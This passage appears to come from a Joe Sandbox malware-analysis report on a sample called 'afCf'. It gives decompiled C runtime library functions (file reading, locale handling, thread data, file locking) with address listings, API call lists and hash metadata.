                            													_t125 = _t55;
                            													_t110 = _t120;
                            												} else {
                            													_t125 = 0x7fffffff % _v16;
                            													_t110 = 0x7fffffff;
                            												}
                            												_t105 = _t110 - _t125;
                            											}
                            											__eflags = _t105 - _v8;
                            											if(_t105 > _v8) {
                            												goto L44;
                            											} else {
                            												_push(_t105);
                            												_push(_v12);
                            												_t106 = E0040FA20(_t125, _t131, _t133);
                            												_pop(_t123);
                            												_push(_t106);
                            												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                            												_t134 = _t134 + 0xc;
                            												__eflags = _t107;
                            												if(_t107 == 0) {
                            													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                            													goto L48;
                            												}
                            												__eflags = _t107 - 0xffffffff;
                            												if(_t107 == 0xffffffff) {
                            													L47:
                            													_t80 = _t133 + 0xc;
                            													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                            													__eflags =  *_t80;
                            													goto L48;
                            												}
                            												_v12 = _v12 + _t107;
                            												_t120 = _t120 - _t107;
                            												_v8 = _v8 - _t107;
                            												goto L39;
                            											}
                            										}
                            										_t113 =  *(_t133 + 4);
                            										__eflags = _t113;
                            										if(__eflags == 0) {
                            											goto L24;
                            										}
                            										if(__eflags < 0) {
                            											goto L47;
                            										}
                            										_t131 = _t120;
                            										__eflags = _t120 - _t113;
                            										if(_t120 >= _t113) {
                            											_t131 = _t113;
                            										}
                            										__eflags = _t131 - _v8;
                            										if(_t131 > _v8) {
                            											_t133 = 0;
                            											__eflags = _a8 - 0xffffffff;
                            											if(__eflags != 0) {
                            												E0040BA30(_t131, _a4, 0, _a8);
                            												_t134 = _t134 + 0xc;
                            											}
                            											_t114 = E0040BFC1(__eflags);
                            											_push(_t133);
                            											_push(_t133);
                            											_push(_t133);
                            											_push(_t133);
                            											 *_t114 = 0x22;
                            											_push(_t133);
                            											goto L4;
                            										} else {
                            											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                            											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                            											 *_t133 =  *_t133 + _t131;
                            											_v12 = _v12 + _t131;
                            											_t120 = _t120 - _t131;
                            											_t134 = _t134 + 0x10;
                            											_v8 = _v8 - _t131;
                            											_t131 = _v20;
                            										}
                            										L39:
                            										__eflags = _t120;
                            									} while (_t120 != 0);
                            									goto L40;
                            								}
                            							}
                            						}
                            						_t118 = _t90 | 0xffffffff;
                            						_t90 = _t118 / _a12;
                            						_t125 = _t118 % _a12;
                            						__eflags = _a16 - _t90;
                            						if(_a16 <= _t90) {
                            							goto L13;
                            						}
                            						goto L9;
                            					}
                            					L3:
                            					_t92 = E0040BFC1(_t138);
                            					_push(_t131);
                            					_push(_t131);
                            					_push(_t131);
                            					_push(_t131);
                            					 *_t92 = 0x16;
                            					_push(_t131);
                            					goto L4;
                            				}
                            			}





























                            0x0040bcc2
                            0x0040bcca
                            0x0040bcce
                            0x0040bcd3
                            0x0040bcd5
                            0x0040bcd8
                            0x0040bcde
                            0x0040bd01
                            0x00000000
                            0x0040bce5
                            0x0040bce5
                            0x0040bce7
                            0x0040bd08
                            0x0040bd0b
                            0x0040bd0d
                            0x0040bd1c
                            0x0040bd1c
                            0x0040bd1f
                            0x0040bd24
                            0x0040bd29
                            0x0040bd29
                            0x0040bd2c
                            0x0040bd2e
                            0x00000000
                            0x0040bd30
                            0x0040bd30
                            0x0040bd35
                            0x0040bd38
                            0x0040bd3b
                            0x00000000
                            0x00000000
                            0x0040bd3d
                            0x0040bd40
                            0x0040bd44
                            0x0040bd4b
                            0x0040bd4e
                            0x0040bd50
                            0x0040bd5a
                            0x0040bd52
                            0x0040bd55
                            0x0040bd55
                            0x0040bd61
                            0x0040bd63
                            0x0040be53
                            0x00000000
                            0x0040bd69
                            0x0040bd69
                            0x0040bd69
                            0x0040bd70
                            0x0040bdb6
                            0x0040bdb6
                            0x0040bdb9
                            0x0040be24
                            0x0040be2a
                            0x0040be2d
                            0x0040beb8
                            0x00000000
                            0x0040bebe
                            0x0040be33
                            0x0040be37
                            0x0040be87
                            0x0040be87
                            0x0040be8b
                            0x0040be95
                            0x0040be9a
                            0x0040be9a
                            0x0040bea2
                            0x0040beaa
                            0x0040beab
                            0x0040beac
                            0x0040bead
                            0x0040beae
                            0x0040bcf9
                            0x0040bcf9
                            0x00000000
                            0x0040bcfe
                            0x0040be39
                            0x0040be3c
                            0x0040be3f
                            0x0040be44
                            0x0040be45
                            0x0040be45
                            0x0040be45
                            0x0040be48
                            0x00000000
                            0x0040be48
                            0x0040bdbb
                            0x0040bdbf
                            0x0040bde0
                            0x0040bde5
                            0x0040bde7
                            0x0040bde9
                            0x0040bde9
                            0x0040bdc1
                            0x0040bdc8
                            0x0040bdca
                            0x0040bdd7
                            0x0040bdd7
                            0x0040bdd7
                            0x0040bdda
                            0x0040bdcc
                            0x0040bdce
                            0x0040bdd1
                            0x0040bdd1
                            0x0040bddc
                            0x0040bddc
                            0x0040bdeb
                            0x0040bdee
                            0x00000000
                            0x0040bdf4
                            0x0040bdf4
                            0x0040bdf5
                            0x0040bdf9
                            0x0040bdfe
                            0x0040bdff
                            0x0040be00
                            0x0040be05
                            0x0040be08
                            0x0040be0a
                            0x0040bec6
                            0x00000000
                            0x0040bec6
                            0x0040be10
                            0x0040be13
                            0x0040beb4
                            0x0040beb4
                            0x0040beb4
                            0x0040beb4
                            0x00000000
                            0x0040beb4
                            0x0040be19
                            0x0040be1c
                            0x0040be1e
                            0x00000000
                            0x0040be1e
                            0x0040bdee
                            0x0040bd72
                            0x0040bd75
                            0x0040bd77
                            0x00000000
                            0x00000000
                            0x0040bd79
                            0x00000000
                            0x00000000
                            0x0040bd7f
                            0x0040bd81
                            0x0040bd83
                            0x0040bd85
                            0x0040bd85
                            0x0040bd87
                            0x0040bd8a
                            0x0040be5b
                            0x0040be5d
                            0x0040be61
                            0x0040be6a
                            0x0040be6f
                            0x0040be6f
                            0x0040be72
                            0x0040be77
                            0x0040be78
                            0x0040be79
                            0x0040be7a
                            0x0040be7b
                            0x0040be81
                            0x00000000
                            0x0040bd90
                            0x0040bd99
                            0x0040bd9e
                            0x0040bda1
                            0x0040bda3
                            0x0040bda6
                            0x0040bda8
                            0x0040bdab
                            0x0040bdae
                            0x0040bdae
                            0x0040be4b
                            0x0040be4b
                            0x0040be4b
                            0x00000000
                            0x0040bd69
                            0x0040bd63
                            0x0040bd2e
                            0x0040bd0f
                            0x0040bd14
                            0x0040bd14
                            0x0040bd17
                            0x0040bd1a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040bd1a
                            0x0040bce9
                            0x0040bce9
                            0x0040bcee
                            0x0040bcef
                            0x0040bcf0
                            0x0040bcf1
                            0x0040bcf2
                            0x0040bcf8
                            0x00000000
                            0x0040bcf8

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                            • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                            • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                            • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __fileno$__getptd_noexit__lock_file
                            • String ID: 'B
                            • API String ID: 3755561058-2787509829
                            • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                            • Instruction ID: 742fd6cfb660563147d10b182e7c20350988fb5bc2ef8563fceff2fef92f9031
                            • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                            • Instruction Fuzzy Hash: 27018E33600A1466C3617B786C4347E77A68F86770735431DF0B0DB1D2EF28D902A19D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __getptd.LIBCMT ref: 006749AB
                              • Part of subcall function 0067099C: __getptd_noexit.LIBCMT ref: 0067099F
                              • Part of subcall function 0067099C: __amsg_exit.LIBCMT ref: 006709AC
                            • __getptd.LIBCMT ref: 006749C2
                            • __amsg_exit.LIBCMT ref: 006749D0
                            • __lock.LIBCMT ref: 006749E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID: @.B
                            • API String ID: 3521780317-470711618
                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                            • Instruction ID: 6fa552dd796b227cb291a89866e90011fba5a55214a3ca05f62e55f5a1a10c6b
                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                            • Instruction Fuzzy Hash: 37F0BB31A40710DBE7A0FB74850A79A73A26F00750F51861DE55CA72D2DF749C01CF9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                            				signed int _t13;
                            				intOrPtr _t28;
                            				void* _t29;
                            				void* _t30;
                            
                            				_t30 = __eflags;
                            				_t26 = __edi;
                            				_t25 = __edx;
                            				_t22 = __ebx;
                            				_push(0xc);
                            				_push(0x4214d0);
                            				E0040E1D8(__ebx, __edi, __esi);
                            				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                            				_t13 =  *0x422e34; // 0xfffffffe
                            				if(( *(_t28 + 0x70) & _t13) == 0) {
                            					L6:
                            					E0040D6E0(_t22, 0xc);
                            					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                            					_t8 = _t28 + 0x6c; // 0x6c
                            					_t26 =  *0x422f18; // 0x422e40
                            					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                            					 *(_t29 - 4) = 0xfffffffe;
                            					E004147A2();
                            				} else {
                            					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                            					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                            						goto L6;
                            					} else {
                            						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                            					}
                            				}
                            				if(_t28 == 0) {
                            					E0040E79A(_t25, _t26, 0x20);
                            				}
                            				return E0040E21D(_t28);
                            			}







                            0x00414738
                            0x00414738
                            0x00414738
                            0x00414738
                            0x00414738
                            0x0041473a
                            0x0041473f
                            0x00414749
                            0x0041474b
                            0x00414753
                            0x00414777
                            0x00414779
                            0x0041477f
                            0x00414783
                            0x00414786
                            0x00414791
                            0x00414794
                            0x0041479b
                            0x00414755
                            0x00414755
                            0x00414759
                            0x00000000
                            0x0041475b
                            0x00414760
                            0x00414760
                            0x00414759
                            0x00414765
                            0x00414769
                            0x0041476e
                            0x00414776

                            APIs
                            • __getptd.LIBCMT ref: 00414744
                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                            • __getptd.LIBCMT ref: 0041475B
                            • __amsg_exit.LIBCMT ref: 00414769
                            • __lock.LIBCMT ref: 00414779
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID: @.B
                            • API String ID: 3521780317-470711618
                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                            • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                            • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___addlocaleref.LIBCMT ref: 00674973
                            • ___removelocaleref.LIBCMT ref: 0067497E
                            • ___freetlocinfo.LIBCMT ref: 00674992
                              • Part of subcall function 006746F0: ___free_lconv_mon.LIBCMT ref: 00674736
                              • Part of subcall function 006746F0: ___free_lconv_num.LIBCMT ref: 00674757
                              • Part of subcall function 006746F0: ___free_lc_time.LIBCMT ref: 006747DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                            • String ID: @.B$@.B
                            • API String ID: 4212647719-183327057
                            • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                            • Instruction ID: 0538985d520025aa5a8dd9a265296821b34a51644a1ccaac1783dd8084f0d4d3
                            • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                            • Instruction Fuzzy Hash: FCE0DF62511A210D8A312A1C68083EBD3970FC2312B1B926EF90CE7245DF268C8084A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                            				intOrPtr _v8;
                            				void* _t16;
                            				void* _t17;
                            				intOrPtr _t19;
                            				void* _t21;
                            				signed int _t22;
                            				intOrPtr* _t27;
                            				intOrPtr _t39;
                            				intOrPtr _t40;
                            				intOrPtr _t50;
                            
                            				_t37 = __edx;
                            				_push(8);
                            				_push(0x421140);
                            				E0040E1D8(__ebx, __edi, __esi);
                            				_t39 = _a4;
                            				_t50 = _t39;
                            				_t51 = _t50 != 0;
                            				if(_t50 != 0) {
                            					E0040FB29(_t39);
                            					_v8 = 0;
                            					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                            					_t16 = E0040FA20(__edx, _t39, _t39);
                            					__eflags = _t16 - 0xffffffff;
                            					if(_t16 == 0xffffffff) {
                            						L6:
                            						_t17 = 0x4227e0;
                            					} else {
                            						_t21 = E0040FA20(__edx, _t39, _t39);
                            						__eflags = _t21 - 0xfffffffe;
                            						if(_t21 == 0xfffffffe) {
                            							goto L6;
                            						} else {
                            							_t22 = E0040FA20(__edx, _t39, _t39);
                            							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                            						}
                            					}
                            					_t9 = _t17 + 4; // 0xa80
                            					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                            					_v8 = 0xfffffffe;
                            					E0040C735(_t39);
                            					_t19 = 0;
                            					__eflags = 0;
                            				} else {
                            					_t27 = E0040BFC1(_t51);
                            					_t40 = 0x16;
                            					 *_t27 = _t40;
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E0040E744(__edx, _t40, 0);
                            					_t19 = _t40;
                            				}
                            				return E0040E21D(_t19);
                            			}













                            0x0040c73d
                            0x0040c690
                            0x0040c692
                            0x0040c697
                            0x0040c69e
                            0x0040c6a3
                            0x0040c6a8
                            0x0040c6aa
                            0x0040c6c8
                            0x0040c6ce
                            0x0040c6d1
                            0x0040c6d6
                            0x0040c6dc
                            0x0040c6df
                            0x0040c70f
                            0x0040c70f
                            0x0040c6e1
                            0x0040c6e2
                            0x0040c6e8
                            0x0040c6eb
                            0x00000000
                            0x0040c6ed
                            0x0040c6ee
                            0x0040c70b
                            0x0040c70b
                            0x0040c6eb
                            0x0040c714
                            0x0040c71b
                            0x0040c71e
                            0x0040c725
                            0x0040c72a
                            0x0040c72a
                            0x0040c6ac
                            0x0040c6ac
                            0x0040c6b3
                            0x0040c6b4
                            0x0040c6b6
                            0x0040c6b7
                            0x0040c6b8
                            0x0040c6b9
                            0x0040c6ba
                            0x0040c6bb
                            0x0040c6c3
                            0x0040c6c3
                            0x0040c731

                            APIs
                            • __lock_file.LIBCMT ref: 0040C6C8
                            • __fileno.LIBCMT ref: 0040C6D6
                            • __fileno.LIBCMT ref: 0040C6E2
                            • __fileno.LIBCMT ref: 0040C6EE
                            • __fileno.LIBCMT ref: 0040C6FE
                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2805327698-0
                            • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                            • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                            • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                            • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __getptd.LIBCMT ref: 0067423F
                              • Part of subcall function 0067099C: __getptd_noexit.LIBCMT ref: 0067099F
                              • Part of subcall function 0067099C: __amsg_exit.LIBCMT ref: 006709AC
                            • __amsg_exit.LIBCMT ref: 0067425F
                            • __lock.LIBCMT ref: 0067426F
                            • InterlockedDecrement.KERNEL32(?), ref: 0067428C
                            • InterlockedIncrement.KERNEL32(00422D38), ref: 006742B7
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                            • Instruction ID: 674366b3bdba27de17c425b9d5e465ba6d7d1e23a8c81386a791e7d6f1ea066d
                            • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                            • Instruction Fuzzy Hash: 0D010431F01620EBD721AB2498097AEB361AF44710F418119F838A7292DF34AA91CFDA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				signed int _t15;
                            				LONG* _t21;
                            				long _t23;
                            				void* _t31;
                            				LONG* _t33;
                            				void* _t34;
                            				void* _t35;
                            
                            				_t35 = __eflags;
                            				_t29 = __edx;
                            				_t25 = __ebx;
                            				_push(0xc);
                            				_push(0x421490);
                            				E0040E1D8(__ebx, __edi, __esi);
                            				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                            				_t15 =  *0x422e34; // 0xfffffffe
                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                            					E0040D6E0(_t25, 0xd);
                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                            					_t33 =  *(_t31 + 0x68);
                            					 *(_t34 - 0x1c) = _t33;
                            					__eflags = _t33 -  *0x422d38; // 0x721658
                            					if(__eflags != 0) {
                            						__eflags = _t33;
                            						if(_t33 != 0) {
                            							_t23 = InterlockedDecrement(_t33);
                            							__eflags = _t23;
                            							if(_t23 == 0) {
                            								__eflags = _t33 - 0x422910;
                            								if(__eflags != 0) {
                            									_push(_t33);
                            									E0040B6B5(_t25, _t31, _t33, __eflags);
                            								}
                            							}
                            						}
                            						_t21 =  *0x422d38; // 0x721658
                            						 *(_t31 + 0x68) = _t21;
                            						_t33 =  *0x422d38; // 0x721658
                            						 *(_t34 - 0x1c) = _t33;
                            						InterlockedIncrement(_t33);
                            					}
                            					 *(_t34 - 4) = 0xfffffffe;
                            					E00414067();
                            				} else {
                            					_t33 =  *(_t31 + 0x68);
                            				}
                            				if(_t33 == 0) {
                            					E0040E79A(_t29, _t31, 0x20);
                            				}
                            				return E0040E21D(_t33);
                            			}










                            0x00413fcc
                            0x00413fcc
                            0x00413fcc
                            0x00413fcc
                            0x00413fce
                            0x00413fd3
                            0x00413fdd
                            0x00413fdf
                            0x00413fe7
                            0x00414008
                            0x0041400e
                            0x00414012
                            0x00414015
                            0x00414018
                            0x0041401e
                            0x00414020
                            0x00414022
                            0x00414025
                            0x0041402b
                            0x0041402d
                            0x0041402f
                            0x00414035
                            0x00414037
                            0x00414038
                            0x0041403d
                            0x00414035
                            0x0041402d
                            0x0041403e
                            0x00414043
                            0x00414046
                            0x0041404c
                            0x00414050
                            0x00414050
                            0x00414056
                            0x0041405d
                            0x00413fef
                            0x00413fef
                            0x00413fef
                            0x00413ff4
                            0x00413ff8
                            0x00413ffd
                            0x00414005

                            APIs
                            • __getptd.LIBCMT ref: 00413FD8
                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                            • __amsg_exit.LIBCMT ref: 00413FF8
                            • __lock.LIBCMT ref: 00414008
                            • InterlockedDecrement.KERNEL32(?), ref: 00414025
                            • InterlockedIncrement.KERNEL32(00721658), ref: 00414050
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                            • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                            • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                            • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: P$B$`$B
                            • API String ID: 3494438863-235554963
                            • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                            • Instruction ID: 8407a78dc349977ac2c255be402d25180c4672cb75ab73469da165bf789e08b0
                            • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                            • Instruction Fuzzy Hash: FD11C6323486155BE724CF2DBC50BA53397EF85724B64463BE615CB3A4E774E883468C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00413610() {
                            				signed long long _v12;
                            				signed int _v20;
                            				signed long long _v28;
                            				signed char _t8;
                            
                            				_t8 = GetModuleHandleA("KERNEL32");
                            				if(_t8 == 0) {
                            					L6:
                            					_v20 =  *0x41fb50;
                            					_v28 =  *0x41fb48;
                            					asm("fsubr qword [ebp-0x18]");
                            					_v12 = _v28 / _v20 * _v20;
                            					asm("fld1");
                            					asm("fcomp qword [ebp-0x8]");
                            					asm("fnstsw ax");
                            					if((_t8 & 0x00000005) != 0) {
                            						return 0;
                            					} else {
                            						return 1;
                            					}
                            				} else {
                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                            					if(__eax == 0) {
                            						goto L6;
                            					} else {
                            						_push(0);
                            						return __eax;
                            					}
                            				}
                            			}







                            0x00413615
                            0x0041361d
                            0x00413634
                            0x004135e0
                            0x004135e9
                            0x004135f5
                            0x004135f8
                            0x004135fb
                            0x004135fd
                            0x00413600
                            0x00413605
                            0x0041360f
                            0x00413607
                            0x0041360b
                            0x0041360b
                            0x0041361f
                            0x00413625
                            0x0041362d
                            0x00000000
                            0x0041362f
                            0x0041362f
                            0x00413633
                            0x00413633
                            0x0041362d

                            APIs
                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsProcessorFeaturePresent$KERNEL32
                            • API String ID: 1646373207-3105848591
                            • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                            • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                            • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                            • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?), ref: 00661B6D
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 00661B96
                            • GetLastError.KERNEL32 ref: 00661BA7
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00661BBF
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00661BE7
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                            • String ID:
                            • API String ID: 3322701435-0
                            • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                            • Instruction ID: 8f70809d158e9c710dcb84151ce5da240c1ca2c4bbdb37938bf874ac0ee929c6
                            • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                            • Instruction Fuzzy Hash: 0A11C4351003647BD3309755DC88F677F6CEBC7BA9F048518FD559E281DA21AC04C6B8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __fileno.LIBCMT ref: 0066C9E3
                            • __locking.LIBCMT ref: 0066C9F8
                              • Part of subcall function 0066C228: __getptd_noexit.LIBCMT ref: 0066C228
                            Memory Dump Source
